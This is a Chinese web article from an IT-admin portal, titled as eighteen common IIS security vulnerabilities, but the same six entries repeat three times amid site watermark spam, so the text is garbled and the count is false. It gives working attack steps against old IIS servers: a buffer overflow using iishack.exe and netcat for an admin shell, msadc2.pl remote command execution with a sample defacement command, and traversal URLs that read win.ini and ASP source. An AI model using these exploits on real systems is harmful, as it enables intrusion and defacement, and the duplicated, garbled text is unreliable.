网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 
中国网管联盟
Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道
 当前位置: > bitsCN.com > windows > 系统安全 > 网络安全 > 网管必知 IIS中常见的十八个安全漏洞  

网管必知 IIS中常见的十八个安全漏洞

2006-09-04  作者:BitsCN整理  来源:中国网管联盟  点评 投稿 收藏

  1. IIS4hack缓冲溢出

  主要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL请求没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序 在系统中下载和执行程序。要检测这样的站点你需要两个文件iishack.exe,ncx.exe,你可以到下面 的站点www.technotronic.com去下载,另外你还需要一台自己的WEB服务器。你现在你自己的WEB服务器上运行WEB服务程序并把ncx.exe放到你自己相应的目录下,然后使用iishack.exe来检查目标机器: 网管论坛bbs_bitsCN_com

  c:>iishack.exe 80 /ncx.exe 网管u家u.bitscn@com

  然后你就使用netcat来连接你要检测的服务器:

网管论坛bbs_bitsCN_com

  c:>nc 80

网管网www.bitscn.com

  如果溢出点正确你就可以看到目标机器的命令行提示,并且是管理远权限。利用程序见iis4hack.zip

网管联盟bitsCN_com

  2.msadc 网管网www.bitscn.com

  IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行你系统的命令。主要核心问题是存在于RDS Datafactory,默认情况下, 它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,其一般默认情况下是SYSTEM用户。利用程序为msadc2.pl,我们看看它的help 网管下载dl.bitscn.com

  [quack@chat quack]$ perl msadc2.pl -h 网管bitscn_com

  -- RDS smack v2 - rain forest puppy / ADM / wiretrip --

网管联盟bitsCN_com

  Usage: msadc.pl -h { -d -X -v }

网管联盟bitsCN@com

  -h = host you want to scan (ip or domain) 网管网www.bitscn.com

  -d = delay between calls, default 1 second 网管网www_bitscn_com

  -X = dump Index Server path table, if available 中国网管论坛bbs.bitsCN.com

  -N = query VbBusObj for NetBIOS name

网管bitscn_com

  -V = use VbBusObj instead of ActiveDataFactory 网管bitscn_com

  -v = verbose 网管下载dl.bitscn.com

  -e = external dictionary file for step 5 网管网www.bitscn.com

  -u <\hostsharefile> = use UNC file 网管联盟bitsCN@com

  -w = Windows 95 instead of Windows NT 中国网管联盟bitsCN.com

  -c = v1 compatibility (three step query) 网管u家u.bitsCN.com

  -s = run only step 网管下载dl.bitscn.com

  Or a -R will resume a (v2) command session 网管联盟bitsCN_com

  [quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/

网管bitscn_com

  -- RDS smack v2 - rain forest puppy / ADM / wiretrip --

网管联盟bitsCN@com

  Type the command line you want to run (cmd /c assumed): 中国网管论坛bbs.bitsCN.com

  cmd /c

中国网管论坛bbs.bitsCN.com

  如果出现cmd /c后,直接键入命令行,就可以以system权限执行命令了。比如xundi教的:

网管u家u.bitscn@com

  echo hacked by me > d:inetpubwwwrootvictimwebindex.htm 中国网管论坛bbs.bitsCN.com

  3.Codebrws.asp

网管论坛bbs_bitsCN_com

  察看文件源代码

中国网管论坛bbs.bitsCN.com

  http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp 网管网www_bitscn_com

  4.Showcode.asp

网管u家u.bitscn@com

  察看文件源代码

网管论坛bbs_bitsCN_com

  http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

网管网www_bitscn_com

  5.Null.htw

网管bitscn_com

  察看文件源代码

网管网www_bitscn_com

  http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

网管网www.bitscn.com

  6.webhits.dll & .htw

网管u家u.bitscn@com

  hit-highligting功能是由Index Server提供的允许一个WEB用户在文档上highlighted(突出)他们原始搜索的条目,这个文档的名字通过变量CiWebhitsfile传递给.htw文件,Webhits.dll是一个ISAPI应用程序 来处理请求,打开文件并返回结果,当用户控制了CiWebhitsfile参数传递给.htw时,他们就可以请求任意文件,结果就是导致查看ASP源码和其他脚本文件内容。要了解你是否存在这个漏洞,你可以请求如下条目: 网管u家u.bitscn@com


  http://www.victim.com/nosuchfile.htw 如果你从服务器端获得如下信息:

网管u家u.bitsCN.com

  format of the QUERY_STRING is invalid这就表示你存在这个漏洞 .这个问题主要就是webhits.dll关联了.htw文件的映射,所以你只要取消 网管联盟bitsCN@com

  这个映射就能避免这个漏洞,你可以在你认为有漏洞的系统中搜索.htw文件,一般会发现如下的程序: 网管联盟bitsCN@com

  /iissamples/issamples/oop/qfullhit.htw 网管联盟bitsCN_com

  /iissamples/issamples/oop/qsumrhit.htw 网管u家u.bitscn@com

  /isssamples/exair/search/qfullhit.htw

中国网管联盟bitsCN.com

  /isssamples/exair/search/qsumrhit.htw 网管联盟bitsCN@com

  /isshelp/iss/misc/iirturnh.htw (这个一般为loopback使用) 网管网www.bitscn.com

  一个攻击者可以使用如下的方法来访问系统中文件的内容: 网管联盟bitsCN@com

  http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?

网管联盟bitsCN_com

  ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

网管论坛bbs_bitsCN_com

  就会在有此漏洞系统中win.ini文件的内容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的内容,你可以请求如下的URL: http://www.victim.com/default.asp::$DATA你就得到了源代码 网管联盟bitsCN_com

  7. iis4hack缓冲溢出

中国网管联盟bitsCN.com

  主要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL请求没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序 在系统中下载和执行程序。要检测这样的站点你需要两个文件iishack.exe,ncx.exe,你可以到下面 的站点www.technotronic.com去下载,另外你还需要一台自己的WEB服务器。你现在你自己的WEB服务器上运行WEB服务程序并把ncx.exe放到你自己相应的目录下,然后使用iishack.exe来检查目标机器: 网管论坛bbs_bitsCN_com

  c:>iishack.exe 80 /ncx.exe 网管网www.bitscn.com

  然后你就使用netcat来连接你要检测的服务器: 网管u家u.bitscn@com

  c:>nc 80 网管联盟bitsCN@com

  如果溢出点正确你就可以看到目标机器的命令行提示,并且是管理远权限。利用程序见iis4hack.zip

网管下载dl.bitscn.com

  8.msadc 中国网管论坛bbs.bitsCN.com

  IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行你系统的命令。主要核心问题是存在于RDS Datafactory,默认情况下, 它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,其一般默认情况下是SYSTEM用户。利用程序为msadc2.pl,我们看看它的help 中国网管论坛bbs.bitsCN.com

  [quack@chat quack]$ perl msadc2.pl -h

中国网管论坛bbs.bitsCN.com

  -- RDS smack v2 - rain forest puppy / ADM / wiretrip --

网管论坛bbs_bitsCN_com

  Usage: msadc.pl -h { -d -X -v }

网管网www.bitscn.com

  -h = host you want to scan (ip or domain) 中国网管论坛bbs.bitsCN.com

  -d = delay between calls, default 1 second 网管u家u.bitsCN.com

  -X = dump Index Server path table, if available 网管联盟bitsCN@com

  -N = query VbBusObj for NetBIOS name

中国网管联盟bitsCN.com

  -V = use VbBusObj instead of ActiveDataFactory

网管联盟bitsCN@com

  -v = verbose 网管下载dl.bitscn.com

  -e = external dictionary file for step 5 网管下载dl.bitscn.com

  -u <\hostsharefile> = use UNC file

网管u家u.bitsCN.com

  -w = Windows 95 instead of Windows NT

网管网www_bitscn_com

  -c = v1 compatibility (three step query)

中国网管论坛bbs.bitsCN.com

  -s = run only step 网管下载dl.bitscn.com

  Or a -R will resume a (v2) command session

网管网www_bitscn_com

  [quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/ 网管论坛bbs_bitsCN_com


  -- RDS smack v2 - rain forest puppy / ADM / wiretrip -- 网管下载dl.bitscn.com

  Type the command line you want to run (cmd /c assumed): 网管u家u.bitsCN.com

  cmd /c

网管联盟bitsCN_com

  如果出现cmd /c后,直接键入命令行,就可以以system权限执行命令了。比如xundi教的: 网管u家u.bitsCN.com

  echo hacked by me > d:inetpubwwwrootvictimwebindex.htm 网管联盟bitsCN_com

  9.Codebrws.asp 中国网管论坛bbs.bitsCN.com

  察看文件源代码 网管联盟bitsCN_com

  http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp 网管下载dl.bitscn.com

  10.Showcode.asp 网管bitscn_com

  察看文件源代码 网管u家u.bitsCN.com

  http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

网管联盟bitsCN_com

  11.Null.htw

网管论坛bbs_bitsCN_com

  察看文件源代码

网管u家u.bitscn@com

  http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full 网管bitscn_com

  12.webhits.dll & .htw 网管论坛bbs_bitsCN_com

  hit-highligting功能是由Index Server提供的允许一个WEB用户在文档上highlighted(突出)他们原始搜索的条目,这个文档的名字通过变量CiWebhitsfile传递给.htw文件,Webhits.dll是一个ISAPI应用程序 来处理请求,打开文件并返回结果,当用户控制了CiWebhitsfile参数传递给.htw时,他们就可以请求任意文件,结果就是导致查看ASP源码和其他脚本文件内容。要了解你是否存在这个漏洞,你可以请求如下条目:

中国网管论坛bbs.bitsCN.com

  http://www.victim.com/nosuchfile.htw 如果你从服务器端获得如下信息:

网管联盟bitsCN@com

  format of the QUERY_STRING is invalid这就表示你存在这个漏洞 .这个问题主要就是webhits.dll关联了.htw文件的映射,所以你只要取消

网管论坛bbs_bitsCN_com

  这个映射就能避免这个漏洞,你可以在你认为有漏洞的系统中搜索.htw文件,一般会发现如下的程序: 网管bitscn_com

  /iissamples/issamples/oop/qfullhit.htw 网管网www_bitscn_com

  /iissamples/issamples/oop/qsumrhit.htw 网管网www.bitscn.com

  /isssamples/exair/search/qfullhit.htw

网管u家u.bitsCN.com

  /isssamples/exair/search/qsumrhit.htw

中国网管论坛bbs.bitsCN.com

  /isshelp/iss/misc/iirturnh.htw (这个一般为loopback使用)

网管论坛bbs_bitsCN_com

  一个攻击者可以使用如下的方法来访问系统中文件的内容: 网管联盟bitsCN@com

  http://www.victim.com/iissamples/issamples/oop/qfullhit.htw? 中国网管联盟bitsCN.com

  ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

网管下载dl.bitscn.com

  就会在有此漏洞系统中win.ini文件的内容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的内容,你可以请求如下的URL: http://www.victim.com/default.asp::$DATA你就得到了源代码 网管论坛bbs_bitsCN_com

  13. iis4hack缓冲溢出 网管联盟bitsCN_com

  主要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL请求没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序 在系统中下载和执行程序。要检测这样的站点你需要两个文件iishack.exe,ncx.exe,你可以到下面 的站点www.technotronic.com去下载,另外你还需要一台自己的WEB服务器。你现在你自己的WEB服务器上运行WEB服务程序并把ncx.exe放到你自己相应的目录下,然后使用iishack.exe来检查目标机器:

网管网www.bitscn.com


  c:>iishack.exe 80 /ncx.exe

网管论坛bbs_bitsCN_com

  然后你就使用netcat来连接你要检测的服务器: 网管联盟bitsCN_com

  c:>nc 80

网管u家u.bitscn@com

  如果溢出点正确你就可以看到目标机器的命令行提示,并且是管理远权限。利用程序见iis4hack.zip

中国网管论坛bbs.bitsCN.com

  14.msadc 网管联盟bitsCN_com

  IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行你系统的命令。主要核心问题是存在于RDS Datafactory,默认情况下, 它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,其一般默认情况下是SYSTEM用户。利用程序为msadc2.pl,我们看看它的help 网管网www.bitscn.com

  [quack@chat quack]$ perl msadc2.pl -h

网管下载dl.bitscn.com

  -- RDS smack v2 - rain forest puppy / ADM / wiretrip --

网管u家u.bitscn@com

  Usage: msadc.pl -h { -d -X -v } 网管u家u.bitscn@com

  -h = host you want to scan (ip or domain) 网管下载dl.bitscn.com

  -d = delay between calls, default 1 second 网管下载dl.bitscn.com

  -X = dump Index Server path table, if available

网管网www_bitscn_com

  -N = query VbBusObj for NetBIOS name 网管下载dl.bitscn.com

  -V = use VbBusObj instead of ActiveDataFactory 网管网www.bitscn.com

  -v = verbose

中国网管论坛bbs.bitsCN.com

  -e = external dictionary file for step 5 中国网管论坛bbs.bitsCN.com

  -u <\hostsharefile> = use UNC file 网管联盟bitsCN@com

  -w = Windows 95 instead of Windows NT 网管u家u.bitscn@com

  -c = v1 compatibility (three step query) 网管下载dl.bitscn.com

  -s = run only step

中国网管论坛bbs.bitsCN.com

  Or a -R will resume a (v2) command session 网管下载dl.bitscn.com

  [quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/ 网管网www_bitscn_com

  -- RDS smack v2 - rain forest puppy / ADM / wiretrip -- 网管联盟bitsCN_com

  Type the command line you want to run (cmd /c assumed): 网管网www_bitscn_com

  cmd /c 网管u家u.bitsCN.com

  如果出现cmd /c后,直接键入命令行,就可以以system权限执行命令了。比如xundi教的:

网管下载dl.bitscn.com

  echo hacked by me > d:inetpubwwwrootvictimwebindex.htm

网管联盟bitsCN_com

  15.Codebrws.asp

网管bitscn_com

  察看文件源代码

网管联盟bitsCN_com

  http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

网管网www.bitscn.com

  16.Showcode.asp

网管u家u.bitscn@com

  察看文件源代码 网管u家u.bitsCN.com

  http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini 网管联盟bitsCN_com

  17.Null.htw 网管联盟bitsCN@com

  察看文件源代码 网管联盟bitsCN_com

  http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

网管论坛bbs_bitsCN_com

  18.webhits.dll & .htw 网管u家u.bitscn@com

  hit-highligting功能是由Index Server提供的允许一个WEB用户在文档上highlighted(突出)他们原始搜索的条目,这个文档的名字通过变量CiWebhitsfile传递给.htw文件,Webhits.dll是一个ISAPI应用程序 来处理请求,打开文件并返回结果,当用户控制了CiWebhitsfile参数传递给.htw时,他们就可以请求任意文件,结果就是导致查看ASP源码和其他脚本文件内容。要了解你是否存在这个漏洞,你可以请求如下条目:

网管联盟bitsCN@com

  http://www.victim.com/nosuchfile.htw 如果你从服务器端获得如下信息: 网管网www.bitscn.com

  format of the QUERY_STRING is invalid这就表示你存在这个漏洞 .这个问题主要就是webhits.dll关联了.htw文件的映射,所以你只要取消

网管网www.bitscn.com


  这个映射就能避免这个漏洞,你可以在你认为有漏洞的系统中搜索.htw文件,一般会发现如下的程序: 网管下载dl.bitscn.com

  /iissamples/issamples/oop/qfullhit.htw 网管论坛bbs_bitsCN_com

  /iissamples/issamples/oop/qsumrhit.htw

网管网www_bitscn_com

  /isssamples/exair/search/qfullhit.htw 网管bitscn_com

  /isssamples/exair/search/qsumrhit.htw

网管u家u.bitsCN.com

  /isshelp/iss/misc/iirturnh.htw (这个一般为loopback使用)

网管下载dl.bitscn.com

  一个攻击者可以使用如下的方法来访问系统中文件的内容:

网管联盟bitsCN_com

  http://www.victim.com/iissamples/issamples/oop/qfullhit.htw? 网管论坛bbs_bitsCN_com

  ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

网管联盟bitsCN@com

  就会在有此漏洞系统中win.ini文件的内容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的内容,你可以请求如下的URL:http://www.victim.com/default.asp::$DATA你就得到了源代码。

网管bitscn_com

 

中国网管联盟bitsCN.com


TAGs十八   常见   网管   漏洞   程序   命令   服务器    
 上一篇:与脚本病毒做斗争,几种常见的杀毒方法   下一篇:热点分析:下一个网络安全威胁会是什么?
相关文章列表
网管必知 IIS中常见的十八个安全漏洞 评论:
loading.. 评论加载中…
评论:请自觉遵守互联网相关政策法规,评论不得超过250字。

验证码: 注册用户
本类热门排行:
1.菜鸟都学会 十三步简单入侵个人电脑
2.ARP攻击防制进阶篇
3.禁用USB接口将网络安全进行到底
4.走出误区 教你杀毒软件到底该怎么用
5.如何发布位于本地主机上的Web站点(上)
6.在Windows系统中跟踪IP地址
7.年初17大热门技术 年底走势如何
8.启用IP安全策略防Ping
9.网络安全基础 教你怎样关闭网络端口
10.小心谨防黑客将Alexa改造成木马二
最新推荐文章:
1.修改远程桌面端口,让你的Vista更安全
2.P2P Windows网络安全 我们离它只有五步
3.强行删除Windows Xp进程的方法
4.轻松斩断入侵 局域网简单攻防实录
5.使用证书服务确保无线 LAN 安全
6.ARP攻击防制进阶篇
7.安全使用IM的十大诀窍
8.网络安全之系统帐户权限设置详解一
9.网络安全基础 教你怎样关闭网络端口
10.如何堵住黑客非法入侵的11点原则
网管论坛交流:
·不疯魔不成活
·令你大开眼界的真正标准化机房,已整理重
·华为HCSE OSPF路由协议培训教材 V3.0
·为赈灾,女孩舍身拍“裸照”
·Windows Server 2003服务器群集创建和配
·exchange2k3全套官方资料
·双儿一周岁了。。。特殊的礼物来啦。。
·存储备份技术版块守则
·无盘技术交流区守则
·DOS命令基础大全之命令详解<作者吐血